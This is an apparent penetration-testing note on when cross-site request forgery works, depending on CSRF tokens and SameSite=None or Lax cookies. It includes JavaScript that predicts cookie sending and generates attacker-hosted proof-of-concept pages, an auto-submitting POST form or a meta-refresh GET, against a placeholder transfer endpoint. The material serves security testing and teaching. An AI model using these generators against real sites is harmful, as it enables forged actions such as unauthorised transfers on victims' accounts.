Prerequisites of Exploitation
Prerequisites
No CSRF token, or a weakly generated CSRF token (predictable, reusable across requests, or not bound to the victim's session)
SameSite attribute of the important (session) cookie set to None. Browsers only honour SameSite=None on a cookie that is also marked Secure, so the target must be reachable over HTTPS; with that in place the cookie is attached to any cross-site request, including an auto-submitted POST form.
or
No CSRF token, or a weakly generated CSRF token
SameSite attribute of the important (session) cookie set to Lax, with the following additional prerequisites:
The request must use a safe method (GET, HEAD, OPTIONS, TRACE): a Lax cookie is only attached to those. Exploitation therefore depends on the server performing the state change in response to such a request, typically a GET.
The request must be a top-level navigation, e.g. clicking a link, following a redirect, a meta refresh or a script setting window.location. Subresource loads (img, script, iframe, fetch/XHR) are not top-level navigations and will not include the cookie.
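The two branches above can be checked mechanically. The block below is an added example, not code from the original page: a small model of the browser's SameSite decision for a cross-site request, followed by a builder for the matching CSRF proof-of-concept page. The target URL and parameter names are invented. It goes slightly beyond the page in one respect: it also models Chromium's behaviour for a cookie set with no SameSite attribute at all, which is treated as Lax but still sent on a top-level POST for the first two minutes after the cookie was set.

```javascript
// Added example (not from the original page). Models whether a cross-site
// request will carry a cookie, given the cookie's attributes and the kind of
// request the attacker page triggers, then builds the matching PoC HTML.

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS", "TRACE"]);

// attrs: { sameSite: "None"|"Lax"|"Strict"|undefined, secure: bool, ageSeconds: number }
// req:   { method: string, topLevel: bool, https: bool }
// Returns true when the browser would attach the cookie to the cross-site request.
function cookieSentCrossSite(attrs, req) {
  const method = req.method.toUpperCase();
  const mode = attrs.sameSite ? attrs.sameSite.toLowerCase() : "unspecified";

  if (mode === "none") {
    // SameSite=None is only honoured on a Secure cookie over HTTPS;
    // otherwise the cookie is rejected and nothing is sent cross-site.
    return Boolean(attrs.secure) && Boolean(req.https);
  }
  if (mode === "strict") return false;

  // Lax, and Chromium's Lax-by-default for an unspecified attribute:
  // only top-level navigations with a safe method carry the cookie.
  if (!req.topLevel) return false; // img/script/iframe/fetch never get it
  if (SAFE_METHODS.has(method)) return true;

  // Chromium's "Lax-allowing-unsafe" window: a cookie set without any SameSite
  // attribute and less than 2 minutes old is still sent on a top-level POST.
  return mode === "unspecified" && method === "POST" &&
         (attrs.ageSeconds ?? Infinity) < 120;
}

// Minimal attribute escaping so parameter values cannot break out of the PoC markup.
function escapeAttr(s) {
  return String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
}

// Builds the attacker-hosted page for the chosen method.
// target and params are hypothetical; pick them from the real request being tested.
function buildPoc(target, params, method) {
  if (method.toUpperCase() === "GET") {
    // A meta refresh is a top-level navigation, so a Lax cookie rides along.
    const url = `${target}?${new URLSearchParams(params)}`;
    return `<meta http-equiv="refresh" content="0;url=${escapeAttr(url)}">`;
  }
  // Auto-submitted POST form: needs SameSite=None (or the Lax+POST 2-minute window).
  const inputs = Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join("");
  return `<form id="f" method="POST" action="${escapeAttr(target)}">${inputs}</form>` +
         `<script>document.getElementById("f").submit()</script>`;
}

// Example run against a constructed target (not a real site).
const target = "https://bank.example/transfer";
const lax = { sameSite: "Lax" };
console.log("Lax + top-level GET :", cookieSentCrossSite(lax, { method: "GET", topLevel: true, https: true }));
console.log("Lax + <img> GET     :", cookieSentCrossSite(lax, { method: "GET", topLevel: false, https: true }));
console.log("Lax + form POST     :", cookieSentCrossSite(lax, { method: "POST", topLevel: true, https: true }));
console.log(buildPoc(target, { to: "attacker", amt: "100" }, "GET"));
```

When the cookie is Lax, the only PoC worth hosting is the top-level GET; if the server refuses to act on GET, the Lax branch is a dead end unless the cookie was issued without an explicit SameSite attribute and you can get the victim to reach the form within the two-minute window. Use the None branch (auto-submitted form) whenever the cookie is SameSite=None and Secure.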